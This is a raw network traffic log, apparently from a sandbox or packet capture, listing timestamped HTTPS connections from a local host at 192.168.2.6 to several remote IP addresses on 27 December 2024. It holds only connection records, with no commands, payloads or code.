                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.587574005 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.592430115 CET44350051162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.592504025 CET50051443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.595166922 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.595216990 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.595236063 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.595242977 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.595350981 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.604634047 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.610344887 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.610423088 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.610430002 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.617779970 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.617830038 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.617837906 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.625433922 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.625484943 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.625493050 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.632843971 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.632910013 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.632919073 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.634182930 CET44350052162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.634249926 CET50052443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.640994072 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.641094923 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.641146898 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.641154051 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.642373085 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.644613981 CET44350053162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.644678116 CET50053443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.647984982 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.655548096 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.655618906 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.655623913 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.665123940 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.665191889 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.665196896 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.676949978 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.677006006 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.677011967 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.678648949 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.678706884 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.678711891 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.684984922 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.685038090 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.685043097 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.691929102 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.692022085 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.692027092 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.692071915 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.692176104 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.698788881 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.713517904 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.713615894 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.713623047 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.713648081 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.713711023 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.713740110 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.716738939 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.716907024 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.716912985 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.717634916 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.717689037 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.717694998 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.722248077 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.722306013 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.722311974 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.726861000 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.727070093 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.727076054 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.731545925 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.731601000 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.731605053 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.736145973 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.736200094 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.736203909 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.740757942 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.740828037 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.740833998 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.745235920 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.745287895 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.745292902 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.745420933 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.745496988 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.745554924 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.328676939 CET44350070162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.328777075 CET50070443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.342693090 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.342732906 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.343240976 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.343491077 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.343502998 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.358666897 CET44350068162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.358771086 CET44350068162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.358822107 CET50068443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.358841896 CET50068443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.366849899 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.367130995 CET50072443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.367156982 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.368185997 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.368249893 CET50072443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.369379997 CET50072443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.369446039 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.369674921 CET50072443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.369683027 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.370692015 CET44350085162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.370985985 CET50085443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.370997906 CET44350085162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.372008085 CET44350085162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.372081995 CET50085443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.372987986 CET50085443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.373051882 CET44350085162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.373250008 CET50085443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.373258114 CET44350085162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.375807047 CET44350069162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.375874996 CET50069443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.414999962 CET44350078162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.415312052 CET50078443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.415328979 CET44350078162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.416341066 CET44350078162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.416403055 CET50078443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.418936014 CET44350071162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.419764042 CET50071443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.419774055 CET44350071162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.420157909 CET50078443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.420221090 CET44350078162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.420279026 CET50078443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.420825005 CET44350071162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.420881033 CET50071443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.421077967 CET44350084162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.421227932 CET50071443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.421293020 CET44350071162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.421356916 CET50084443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.421372890 CET44350084162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.421456099 CET50071443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.421469927 CET44350071162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.422432899 CET44350084162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.422496080 CET50084443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.422872066 CET50084443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.422934055 CET44350084162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.423013926 CET50084443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.423019886 CET44350084162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.423036098 CET50085443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.467334986 CET44350078162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.468431950 CET50072443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.468449116 CET50084443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.468449116 CET50071443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.484172106 CET50092443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.484213114 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.484352112 CET50092443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.484512091 CET50092443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.484529018 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.511998892 CET44350079162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.512254953 CET50079443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.512265921 CET44350079162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.513312101 CET44350079162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.513462067 CET50079443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.513835907 CET50079443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.513920069 CET44350079162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.513932943 CET50079443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.530838966 CET50078443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.530854940 CET44350078162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.547624111 CET50093443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.547656059 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.547806025 CET50093443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.547955990 CET50093443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.547970057 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.555335999 CET44350079162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.618242979 CET443500582.16.158.176192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.618370056 CET443500582.16.158.176192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.618418932 CET50058443192.168.2.62.16.158.176
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.618464947 CET50058443192.168.2.62.16.158.176
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.667505980 CET50079443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.667516947 CET44350079162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.676896095 CET50078443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.772667885 CET50079443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.908663034 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.908715963 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.910855055 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.995901108 CET44350085162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.996051073 CET44350085162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.996635914 CET50085443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.996861935 CET50085443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.996886015 CET44350085162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.007046938 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.007118940 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.007167101 CET50072443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.007302999 CET50072443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.007316113 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.031656981 CET44350084162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.031718969 CET44350084162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.031768084 CET50084443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.031917095 CET50084443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.031933069 CET44350084162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.032428026 CET44350078162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.032481909 CET44350078162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.032727957 CET50078443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.032790899 CET50078443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.032800913 CET44350078162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.044914961 CET44350071162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.044975042 CET44350071162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.045058012 CET50071443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.045192957 CET50071443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.045212984 CET44350071162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.084465981 CET44350079162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.084636927 CET44350079162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.084741116 CET50079443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.084801912 CET50079443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.084811926 CET44350079162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.207066059 CET4435006618.165.220.66192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.207179070 CET4435006618.165.220.66192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.207181931 CET50066443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.207273960 CET50066443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.271042109 CET44350050188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.271109104 CET44350050188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.271112919 CET50050443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.271151066 CET50050443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321589947 CET50097443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321592093 CET50098443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321615934 CET44350097162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321624041 CET44350098162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321675062 CET50097443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321806908 CET50098443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321854115 CET50097443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321870089 CET44350097162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321966887 CET50098443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321980953 CET44350098162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.661716938 CET50101443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.661736965 CET44350101162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.661861897 CET50102443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.661874056 CET50101443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.661890984 CET44350102162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.662142038 CET50102443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.664084911 CET50101443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.664097071 CET44350101162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.664366007 CET50102443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.664381027 CET44350102162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.748852968 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.750366926 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.750377893 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.753758907 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.753823042 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.754323006 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.754403114 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.754430056 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.795337915 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.831937075 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.834352016 CET50092443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.834367037 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.834716082 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.838609934 CET50092443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.838691950 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.838783979 CET50092443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.870992899 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.871010065 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.879343987 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.880812883 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.881155968 CET50093443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.881170034 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.882249117 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.882597923 CET50093443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.882766008 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.883148909 CET50093443192.168.2.6162.159.61.3
